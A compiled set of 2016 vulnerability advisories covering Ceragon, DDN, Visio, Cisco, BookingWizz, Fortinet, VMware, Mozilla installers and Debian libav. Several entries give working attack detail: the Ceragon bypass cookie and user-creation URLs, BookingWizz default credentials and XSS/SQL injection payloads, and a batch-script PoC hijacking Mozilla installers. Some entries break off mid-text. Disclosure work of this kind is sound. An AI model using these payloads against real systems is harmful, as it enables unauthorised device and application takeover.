Authentication bypass in Ceragon FibeAir IP-10 web interface (<7.2.0)

[iancling]

[+] Credits: Ian Ling
[+] Website: iancaling.com

Vendor:
=
www.ceragon.com

Product:
==
-FibeAir IP-10

Vulnerability Type:
===
Default Root Account

CVE Reference:
==
N/A

Vulnerability Details:
=
Ceragon FibeAir IP-10 devices do not properly ensure that a user has 
authenticated before granting them access to the web interface of the device. 
The attacker simply needs to add a cookie to their session named "ALBATROSS" 
with the value "0-4-11". They can then browse to one of the following URL's 
(varies by model number and software version) to add their own user account 
with full admin privileges:

/responder.fcgi1?winid=106=Users%20%26%20Groups=1=1
/responder.fcgi1?winid=109=Users%20%26%20Groups=1=1
/responder.fcgi1?winid=103=Users%20%26%20Groups=1=1
/responder.fcgi0?winid=89=Users%20%26%20Groups=0

After adding their own user account, they can clear their cookies and log in 
with the new credentials they created.

Affected versions:
All versions below 7.2.0

Impact:
The remote attacker has full control over the device's web interface.


Disclosure Timeline:
===
Vendor Notification: May 5, 2016
Public Disclosure: June 15, 2016

Exploitation Technique:
===
Remote

Severity Level:

Critical

[MWR-2016-0002] DDN Default SSH Keys

[john . fitzpatrick]

###[DDN Default SSH Keys]###

DDN SFA devices have default SSH keys in place

* Product: DDN SFA storage devices, all versions, all models
* Severity: High
* CVE Reference: NO CVE ASSIGNED - MWR ref: MWR-2016-0002
* Type: Default Credentials
* Author: John Fitzpatrick
* Date: 2016-06-15

## Description

DDN controllers ship with a set of static entries within the authorized_keys 
file of several of the user accounts. The corresponding private keys can be 
obtained from publicly available sources.


## Impact

An adversary can make use of these keys in order to gain access to the DDN 
controller even if the default passwords have been changed.


## Cause

Insecure design and device hardening.


## Interim Workaround

MWR strongly recommend restricting access to all DDN management interfaces via 
the use of ACLs until DDN provide an appropriate resolution to this issue.


## Solution

DDN have not provided a solution to this and have indicated that they may 
resolve it towards the end of the second half of 2016. Exploitation of this 
issue combined with MWR-2016-0001 (DDN Insecure Imaging Process) can provide 
the access required in order to resolve this but may affect any 
warranty/support contract covering the devices.

A solution to this issue will require a firmware update from DDN which removes 
these keys on deployment of new firmware.


## Further Information

DDN controllers run a Debian derived Linux distribution which has a number of 
different users. Some of these users are configured with an authorized_keys 
entry permitting them to log in via SSH using the corresponding private key. 
The authorized_keys entries were found to be common across all DDN devices and 
versions tested meaning exposure of the corresponding private keys would 
provide an adversary access to all DDN devices.

The corresponding private key was found to also be included within the firmware 
distributed for DDN controllers. DDN firmware is available for download by any 
DDN customer, although with some searching can also be found publicly too.

The following user accounts on the DDN controllers were found to permit 
authentication using known keys. The respective MD5sums are shown below:

   diag:
   /home/diag/.ssh$ md5sum *
   e5138c922279b8d194896bacefc31992  authorized_keys
   d2a101dc1f8dd610c146735d71d7e77a  id_rsa

   stats:
   /home/stats/.ssh$ md5sum *
   7c3c7a068e07ed28a84eba1d3b4812a1  authorized_keys
   ffe5fdd80332ed5170851b3d8cdf6f30  id_rsa

   user:
   /home/user/.ssh$ md5sum *
   7c3c7a068e07ed28a84eba1d3b4812a1  authorized_keys
   ffe5fdd80332ed5170851b3d8cdf6f30  id_rsa

   ddn:
   /ddn/.ssh$ md5sum *
   1076f91f58db9040d87fe29b863ad5b7  authorized_keys
   202a962bac24c892c1248dff050d413c  id_rsa

Anyone in possession of the respective private keys would be in a position to 
authenticate via SSH as any one of the users listed above.

The root user does not have any authorized_keys entries, additionally the 
default SSH configuration does not permit root to log in via SSH. The firmware 
user also has no authorized_keys entries.

When combined with the vulnerability described in “DDN Insecure Update Process 
– MWR-2016-0001” it is possible to gain full root access to a DDN controller.

This advisory will be updated appropriately should DDN choose to provide a 
solution to this security issue.


## Timeline

2016-03-09: Initial contact made with DDN
2016-03-14: Conference call with DDN engineers
2016-03-15: Full vulnerability details provided to DDN
2016-05-16: Advisory released for limited disclosure
2016-06-15: Advisory released

(Thanks to those who were key in identifying this vulnerability)

The full MWRLabs maintained advisory can be found here: 
https://labs.mwrinfosecurity.com/advisories/ddn-default-ssh-keys/

[MWR-2016-0001] DDN Insecure Update Mechanism

[john . fitzpatrick]

###[DDN Insecure Update Process]###

An insecure update mechanism on DDN SFA devices allows for privilege escalation

* Product: DDN SFA storage devices, all versions, all models
* Severity: High
* CVE Reference: NO CVE ASSIGNED - MWR ref: MWR-2016-0001)
* Type: Insecure update mechanism
* Author: John Fitzpatrick
* Date: 2016-06-15


## Description

The mechanism used for updating firmware on DDN controllers is insecure 
allowing for privilege escalation to root.


## Impact

Exploitation of this issue can allow for code execution as root allowing an 
adversary to gain full access to the DDN controller.


## Cause

This is caused by an insecure firmware update mechanism which does not validate 
the legitimacy of the firmware being uploaded.


## Interim Workaround

MWR strongly recommend restricting access to all DDN management interfaces via 
the use of ACLs until DDN provide an appropriate resolution to this issue. In 
addition it should be ensured that appropriate mitigating controls are 
implemented for the accompanying advisory “DDN Default SSH Keys – 
MWR-2016-0002” and that default user account passwords are changed. 


## Solution

There is no vendor supplied solution to this vulnerability. When DDN have 
resolved this vulnerability DDN users should apply the appropriate fixes.

It is recommended that DDN implement a signing mechanism that validates that 
firmware is from a trusted source before attempting to deploy it. Making use of 
public key cryptography in order to sign firmware would be a suitable approach 
if correctly implemented. DDN have, however, chosen not to comment on their 
preferred resolution or its progress but have indicated that they may resolve 
this issue towards the end of 2016.


## Further Information

DDN firmware is provided as a .tar file. Within this archive is another archive 
containing the contents of the filesystem which, when an update is run, is 
extracted and deployed to disk. A number of shell scripts also execute during 
the update process and these are executed as root. Therefore, by either 
manipulating the shell scripts or by modifying the filesystem contents within 
the archive, it is possible perform activities which would provide full root 
access to the DDN device.

There is a signing mechanism in place; however, this is focused on ensuring 
files are not corrupt rather than ensuring that files are from a legitimate 
source. Within janus.md5 is a list of MD5 checksums for all files within the 
archive. These entries can simply be replaced with new MD5s as appropriate.

In order to perform an update, it is necessary to have access to accounts on 
the DDN controller. Our testing was performed via SSH using the firmware 
account to drop the firmware. This account has a very guessable password set by 
default. The ddn user account was then used in order to load the new 
config/firmware via the appropriate menu options. The ddn user also has a 
default password set, but this is much less guessable. However, even if the 
default passwords have been changed it will be possible to use the default SSH 
keys described in MWR-2016-0002 (DDN Default SSH Keys) in order to gain the 
required level of access in order to deploy the new firmware.

Ironically, successful exploitation of this insecure update mechanism allows 
DDN users to remove the default SSH keys and secure their devices. Whether this 
would impact support contracts or warranties with DDN or other suppliers is 
unknown.

This advisory will be updated should DDN choose to provide an appropriate 
solution to this security issue.


## Timeline

2016-03-09: Initial contact made with DDN
2016-03-14: Conference call with DDN engineers
2016-03-15: Full vulnerability details provided to DDN
2016-05-16: Advisory released for limited disclosure
2016-06-15: Advisory released

(Thanks to those who were key in identifying this vulnerability)

The full MWRLabs maintained advisory can be found here: 
https://labs.mwrinfosecurity.com/advisories/ddn-insecure-update-process/

Microsoft Visio multiple DLL side loading vulnerabilities

[Securify B.V.]

Microsoft Visio multiple DLL side loading vulnerabilities

Yorick Koster, August 2015


Abstract

Multiple DLL side loading vulnerabilities were found in Microsoft Visio.
These issues can be exploited by loading various Visio COM components as
an embedded OLE object. When instantiating a vulnerable object Windows
will try to load the DLL msoutls.dll from the current working directory.
If an attacker convinces the user to open a specially crafted (Office)
document from a directory also containing the attacker's DLL file, it is
possible to execute arbitrary code with the privileges of the target
user. This can potentially result in the attacker taking complete
control of the affected system.


See also

- CVE-2016-3235
- MS16-070: Security Update for Microsoft Office (3163610)


Tested versions

This issue was successfully verified on Windows 7 + Visio 2010.
Microsoft reports that this issue also affects Microsoft Visio 2007,
Microsoft Visio 2013, and Microsoft Visio 2016.


Fix

Microsoft released MS16-070 that fixes this vulnerability.


Details

https://www.securify.nl/advisory/SFY20150804/microsoft_visio_multiple_dll_side_loading_vulnerabilities.html

Cisco Security Advisory: Cisco RV110W, RV130W, and RV215W Routers Arbitrary Code Execution Vulnerability

[Cisco Systems Product Security Incident Response Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Cisco RV110W, RV130W, and RV215W Routers Arbitrary Code Execution Vulnerability

Advisory ID: cisco-sa-20160615-rv

Revision 1.0

For Public Release 2016 June 15 16:00 UTC (GMT)

+-

Summary
===

A vulnerability in the web interface of the Cisco RV110W Wireless-N VPN 
Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and the Cisco 
RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to 
execute arbitrary code as root on a targeted system.
 
The vulnerability is due to insufficient sanitization of HTTP user-supplied 
input. An attacker could exploit this vulnerability by sending a crafted HTTP 
request with custom user data. An exploit could allow the attacker to execute 
arbitrary code with root-level privileges on the affected system, which could 
be leveraged to conduct further attacks.

Cisco has not released software updates that address this vulnerability. 
Workarounds that mitigate this vulnerability are not available. 

This advisory is available at the following link: 

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (SunOS)

iQIVAwUBV1iuka89gD3EAJB5AQJHig/6A8c0ghf49Ku0Z3nkuRKv0V1jrahBY6uX
RemK4SgHfPqUjeSaM9ci2RuCqFe1BeDOK9GBM3P6Mw0Tq5SpMndGD46P4Ha0hgL/
WuJsiwaPkOFKFS47pIKdX0k97RX9AWlHjYoB9XIXb19M+449rHi0Cz90b3Wk1w60
rXYtVtbqdiL5WVn/HmYA95EzwZ4HozVZvDIAzKkUy+mjOkTSHR38gpLSoCibB+3l
I6U2Txc2crjnaUxupTRs9IG+hcDvNCaLb8C/ojSrXpQQGV3Q9XEXE9x/EZMLFl9x
aQkJRiKT8aGAZfqqvP9JxuECXSTm2koYR2sgaI0yJWmpp068j0dA6zdc/zn/nM7N
Rx27U1yWFH0qbFn8q65BbS/IOw+u1aV/LtmieWxuySHW0/BlVPEJyFXRZaS+rSfF
Ted/NRe9e4XGd6Bn98S9+8vXXrvcaWcrxrl3aLy+lDstbl07EOC+eLd+YvzRrxbj
s3uKiliQpryCkSC49SaY0zmj11KMpB0psLeUKPhJWzpa7LJpSRZtTbDyCjMrtspw
mwobTZB+V8cVayhrPwGIyUN0ImfGg3DH1vlNoaUoXD8Wcj0T9dhWBkwx0dH/Oxol
pSsR95Pi3p2e5xS47+7b1l1ViR0eTBTeCT+4bHMfPoDcp8msEJ/sSxpwZgiPAdjv
53TxLvrILWg=
=2XbL
-END PGP SIGNATURE-

BookingWizz < 5.5 Multiple Vulnerability

[mehmet]

1. ADVISORY INFORMATION

Title: BookingWizz < 5.5 Multiple Vulnerability
Application: BookingWizz 
Class: Sensitive Information disclosure
Remotely Exploitable: Yes
Versions Affected: < 5.5
Vendor URL: http://codecanyon.net/item/booking-system/87919
Bugs:  Default credentials, CSRF, XXS, SQLi Injection, LFI
Date of Public Advisory: 15 Jun 2016
Author: Mehmet Ince


2. CREDIT

Those vulnerabilities was identified during external penetration test
by Mehmet INCE from PRODAFT / INVICTUS

Original Advisory: 
https://www.mehmetince.net/exploit/bookingwizz-55-multiple-vulnerability

PR1 - Default Administrator Credentials

File: install.php

People are to lazy to change default credential unless application force them 
to do that.

Line 128: Default username/password: admin/pass";


PR2 - Cross Site Scripting

File : eventList.php
// Improper user input validation on

Line 24: $serviceID = 
(!empty($_REQUEST["serviceID"]))?strip_tags(str_replace("'","`",$_REQUEST["serviceID"])):getDefaultService();

Line 60:   

Payload = 1337" onmouseover="alert(1)
PoC = 
http://www.convergine.com/scripts/booking/eventList.php?serviceID=1337%22%20onmouseover=%22alert(1)


PR3 - Local File Inclusion

File:config.php

Lang variable is under the user control.

Line 31: $lang = (!empty($_REQUEST["lang"])) ? strip_tags(str_replace("'", "`", 
$_REQUEST["lang"])) : 'english';

Storing user controlled variable within session variable.

Line 36 - 38 : 

if (!empty($_REQUEST["action"]) && $_REQUEST["action"] == "changelang") {
$_SESSION['curr_lang'] = $lang;
}

And using it with include function which cause straightforward file inclusion.

Line 60 - 68:

$languagePath = MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";
if(is_file($languagePath)) {

include MAIN_PATH."/languages/".$_SESSION['curr_lang'].".lang.php";

}else{
print "ERROR !!! Language file ".$_SESSION['curr_lang'].".lang.php not 
found";
exit();
}

PR4 - SQL Injection

We've seen a lot of potentially SQL Injection vulnerability during code review.
2 example can be given for this potential points. 

File : ajax/checkDeletedServices.php

line 19 - 20:

$bsid = (!empty($_REQUEST["bsid"])) ? $_REQUEST["bsid"] : array();
$type = (!empty($_REQUEST["type"])) ? $_REQUEST["type"] : 'service';

Line 26:

if($type=='service'){
$service = getService($id);
$name = $service['name'];
}

This function executes query with $id parameter which is user input through 
checkDeletedServices.php file.
function getService($id, $field=null) {

$sql = "SELECT * FROM bs_services WHERE id='{$id}'";
$res = mysql_query($sql);
if ($field == null) {
return mysql_fetch_assoc($res);
} else {
$row = mysql_fetch_assoc($res);
return $row[$field];
}
}


File : ajax/checkChangeAvailability.php

Line 19 -21
$id = (!empty($_REQUEST["id"])) ? $_REQUEST["id"] : '';
$interval = getServiceSettings($id,'interval');


getServiceSettings function calls another function named as getService which is 
also vulnerable against SQL Injection.

function getServiceSettings($id, $field=null) {
$serviceType = getService($id,'type');
if($serviceType=='t'){
 $sql = "SELECT * FROM bs_service_settings bss
INNER JOIN bs_services bs ON bss.serviceId  = bs.id
WHERE bss.serviceID='{$id}'";

}else{
 $sql = "SELECT * FROM  bs_service_days_settings bsds
INNER JOIN bs_services bs ON bsds.idService  = bs.id
WHERE bsds.idService='{$id}'"; 
  
}
$res = mysql_query($sql);
$row = mysql_fetch_assoc($res);
$row['type'] = $serviceType;
if ($field == null) {
return $row;
} else {

return $row[$field];
}
}

In order to exploit this flaws, Time Based SQLi techniques was used.

Payload: id=1' AND SLEEP(5) AND 'WAlE'='WAlE

PR5 - CSRF

File: bs-settings.php

This file is reponsible for administrator account settings.  Here is the HTTP 
POST request.

POST /booking/bs-settings.php HTTP/1.1
Host: www.test.dev
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.test.dev/scripts/booking/bs-settings.php
Cookie: PHPSESSID=1511036c75229f53ae475a0615661394; 
__utma=256227097.1395600583.1465982938.1465982938.1465982938.1; 
__utmc=256227097; 
__utmz=256227097.1465982938.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 
wordfence_verifiedHuman=498f28acf0e6151e19053a23c0fbc76b
Connection: close
Content-Type: multipart/form-data; 

FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability

[Vulnerability Lab]

Document Title:
===
FortiManager & FortiAnalyzer - (filename) Persistent Web Vulnerability


References (Source):

http://www.vulnerability-lab.com/get_content.php?id=1687

Fortinet PSIRT ID: 1624561

Release Notes #1: 
http://docs.fortinet.com/uploaded/files/2796/fortios-5.4.0-release-notes.pdf
Release Notes #2: 
http://docs.fortinet.com/uploaded/files/2861/fortios-v5.2.6-release-notes.pdf
Release Notes #3: 
http://docs.fortinet.com/uploaded/files/2499/fortios-5.0.12-release-notes.pdf


Release Date:
=
2016-06-15


Vulnerability Laboratory ID (VL-ID):

1687


Common Vulnerability Scoring System:

3.7


Product & Service Introduction:
===
FortiManager appliances allow you to centrally manage any number of Fortinet 
devices, from several to thousands, including FortiGate®, FortiWiFi™, 
FortiCarrier™, FortiMail™ and FortiAnalyzer™ appliances and virtual appliances, 
as well as FortiClient™ endpoint security agents. You can further 
simplify control and management of large deployments by grouping devices and 
agents into administrative domains (ADOMs).

The FortiManager family of management appliances provides centralized 
policy-based provisioning, device configuration, and update management for 
FortiGate, FortiWiFi, and FortiMail appliances, and FortiClient end-point 
security agents, plus end-to-end network monitoring and device control. 
FortiManager delivers a lower TCO for Fortinet implementations by minimizing 
both initial deployment costs and ongoing operating expenses. Control 
administrative access and simplify policy deployment using role-based 
administration to define user privileges for specific management domains and 
functions, and aggregating collections of Fortinet appliances and agents into 
independent management domains. In addition, by locally hosting security 
content updates for managed devices and agents, FortiManager appliances 
minimize Web filtering rating request response time and maximize network 
protection.

(Copy of the Vendor Homepage:  
http://www.avfirewalls.com/FortiManager-Series.asp )


Abstract Advisory Information:
==
The Vulnerability Laboratory Core Research Team discovered a persistent web 
validation vulnerability in the official Fotinet FortiManager and FortiAnalyzer 
appliance product series.


Vulnerability Disclosure Timeline:
==
2016-01-25: Researcher Notification & Coordination (Marco Onorati - Evolution 
Security GmbH)
2016-01-26: Vendor Notification (FortiGuard Security Team)
2016-02-10: Vendor Response/Feedback (FortiGuard Security Team)
2016-02-17: Vendor Fix/Patch #1 (Fortinet Service Developer Team)
2016-05-08: Vendor Fix/Patch #2 (Fortinet Service Developer Team)
2016-06-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

Fortinet
Product: FortiManager - Appliance (Web-Application) 200D,  300D, 1000D,  3900E, 
4000E, Virtual Appliances Versio

Fortinet
Product: FortiManager - Appliance (Web-Application) Legacy - 100, 100C, 400A, 
400B, 400C, 1000C, 3000C & 4000

Fortinet
Product: FortiAnalyzer - Appliance (Web-Application) 200D, 300D, 1000D, 2000D, 
3000E, 3500E, 3900E, VM Base & VM 


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Technical Details & Description:

A persistent input validation web vulnerability and filter bypass issue has 
been discovered in the official Fotinet FortiManager and FortiAnalyzer 
appliance product series.
The application-side web vulnerability allows remote attackers to inject own 
malicious script codes on the application-side of the affected modules context.

The vulnerability is located in the `filename` value of the ` Layout Header 
[Header Image]` module. Remote attackers with low privileged web-application 
user accounts 
are able to inject own malicious script codes on the application-side of the 
affected ` Advanced Settings - Advanced Settings - Layout Header` module. The 
request method 
to inject is POST and the issue is located on the application-side of the 
fortimanager/fortianalyzer appliance web-application.

The security risk of the client-side cross site scripting web vulnerability is 
estimated as medium with a cvss (common vulnerability scoring system) count of 
3.7. 
Exploitation of the application-side web vulnerability requires no privileged 
web-application user account and low or medium user interaction. Successful 
exploitation 
of the vulnerability results in persistent phishing, session hijacking, 
persistent external redirect to malicious sources and application-side 
manipulation of affected 
or connected web module context.


Request Method(s):
[+] POST

Vulnerable Module(s):

NEW VMSA-2016-0009 VMware vCenter Server updates address an important reflective cross-site scripting issue

[VMware Security Response Center]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- ---
VMware Security Advisory

Advisory ID: VMSA-2016-0009
Synopsis:VMware vCenter Server updates address an important
 reflective cross-site scripting issue
Issue date:  2016-06-14
Updated on:  2016-06-14 (Initial Advisory)
CVE number:  CVE-2015-6931
- 

1. Summary

   VMware vCenter Server updates address an important reflective
   cross-site scripting issue.

2. Relevant Releases

   vCenter Server 5.5 prior to 5.5 update 2d
   vCenter Server 5.1 prior to 5.1 update 3d
   vCenter Server 5.0 prior to 5.0 update 3g


3. Problem Description

   a. Important vCenter Server reflected cross-site scripting issue

   The vSphere Web Client contains a reflected cross-site scripting
   vulnerability due to a lack of input sanitization. An attacker can
   exploit this issue by tricking a victim into clicking a malicious
   link.

   VMware would like to thank Matt Schmidt for reporting this issue to
   us.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the identifier CVE-2015-6931 to this issue.

   Column 4 of the following table lists the action required to
   remediate the vulnerability in each release, if a solution is
   available.

   VMware ProductRunning   Replace with/
   ProductVersiononApply Patch
   == ======   =
   vCenter Server 6.0Any   not affected
   vCenter Server 5.5Any   5.5 U2d *
   vCenter Server 5.1Any   5.1 U3d *
   vCenter Server 5.0Any   5.0 U3g *

   * The client side component of the vSphere Web Client does not need
 to be updated to remediate CVE-2015-6931. Updating the vCenter
 Server is sufficient to remediate this issue.


4. Solution

   Please review the patch/release notes for your product and
   version and verify the checksum of your downloaded file.

   vCenter Server
   --
   Downloads and Documentation:
   https://www.vmware.com/go/download-vsphere


5. References

   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6931

- 

6. Change log

   2016-06-14 VMSA-2016-0009
   Initial security advisory in conjunction with the release of VMware
   vCenter Server 5.0 U3g on 2016-06-14.

- 

7. Contact

   E-mail list for product security notifications and announcements:
   http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

   This Security Advisory is posted to the following lists:

   security-announce at lists.vmware.com
   bugtraq at securityfocus.com
   fulldisclosure at seclists.org

   E-mail: security at vmware.com
   PGP key at: https://kb.vmware.com/kb/1055

   VMware Security Advisories
   http://www.vmware.com/security/advisories

   Consolidated list of VMware Security Advisories
   http://kb.vmware.com/kb/2078735

   VMware Security Response Policy
   https://www.vmware.com/support/policies/security_response.html

   VMware Lifecycle Support Phases
   https://www.vmware.com/support/policies/lifecycle.html

   Twitter
   https://twitter.com/VMwareSRC

   Copyright 2016 VMware Inc.  All rights reserved.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.8.3 (Build 4028)
Charset: utf-8

wj8DBQFXYOczDEcm8Vbi9kMRApfPAJ0Urm1NrLwTbkY0vsGeXQtS0kWDZQCgmYPj
dGcJx5HCyLJCiIz/FCMpGIU=
=FYiK
-END PGP SIGNATURE-

[CVE-2014-1520] NOT FIXED: privilege escalation via Mozilla's executable installers

[Stefan Kanthak]

Hi @ll,

 should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!

JFTR: this type of vulnerability (really: a bloody stupid trivial
  beginner's error!) is well-known and well-documented as
  .


Proof of concept/demonstration:
~~~

0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   and save them in an arbitrary directory;

1. download 
   plus  and
   save them in an(other) arbitrary directory;

2. start your editor, copy and paste the following 10 lines and
   save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
   and "SENTINEL.EXE" downloaded in step 1:

:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"

3. execute the batch script "POC.CMD" created in step 2;

4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
   "Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
   downloaded in step 0. and proceed as directed: notice the message
   boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
   placed by the batch script started in step 3 in the unsafe TEMP
   subdirectory created by Mozilla's vulnerable executable installers!

PWNED!


Mitigation(s):
~~

0. don't use executable installers. DUMP THEM, NOW!

1. see  as well as
   .

2. stay away from Mozilla's vulnerable installers for their Windows
   software (at least until Mozilla starts to develop a sense for
   the safety and security of their users).


stay tuned
Stefan Kanthak


Timeline:
~

2015-10-25

  not even an attempt to fix this vulnerability (check but
  
)

2016-04-30
  
  
  
  
  

  not even an attempt to fix this vulnerability (check but
  
)

2016-06-15deadline expired after 45 days, report published

[SECURITY] [DSA 3603-1] libav security update

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-3603-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
June 14, 2016 https://www.debian.org/security/faq
- -

Package: libav
CVE ID : CVE-2016-3062

Several security issues have been corrected in multiple demuxers and
decoders of the libav multimedia library. A full list of the changes is
available at
https://git.libav.org/?p=libav.git;a=blob;f=Changelog;hb=refs/tags/v11.7

For the stable distribution (jessie), this problem has been fixed in
version 6:11.7-1~deb8u1.

We recommend that you upgrade your libav packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJXYGwTAAoJEBDCk7bDfE420bEP/0jXRc/ModDoZMmTC8an+9WO
4/H6K2Szm1pMhBpLDhm6B5XgfW7DYaYPtVhtJWMzFOrSTiBLF7yAy9DhW1MSjji/
f41NxH0SDS5Lk1b7ExcKk16zENI47YQSifrJ58KxkAkILhvjhx01+Be2GDtRL0AV
Ov1TMJ2djB1nKv/K3k6m3yCVKUiwVoRh5gDDjsZxg0SuCaQW5ZqeuEJTgRQYZRXy
gM821l8MpvmlGBYS/fd8NBDV+E7MEkrZ970O/rbYvodTNEglBBTONXDKDGzV+nrn
1Ikg2XdTvi8eY086xCQps9VLIxYwBS2VH7J1Wn/NDgRLVAED94lVssamSDYisiQI
EJNq0Wy/qTJ9+lHloaru3kcysl409919sNWcv1Dn9PmsTJ82qow2GrOIDJVJGpfx
3Q2vTXC/1QoWEZ281/+Pgq0twwG6kULN+miu6HRYRFZmldfc+yKfV/ajfPvugXfo
g+QPHllSj0xCqfIBRJYZ7NYZVeGCtlGkElSHqAFjeBTxL9RrYQ4kO7qUqQrEu1gT
l+vIqyzi76EorZIv4puv97R35gYaKH8OttzNIEIntudQ1fHy6LDVpAJVVsVT7lx9
vy3ybYEXj1f0KYpWBxXdSMqtHl1vL0JwDq21yF7CgakoCCDrm95gYu+9DRk+Jj3H
fT+5UuQZUnuM7K/puQKP
=qHxR
-END PGP SIGNATURE-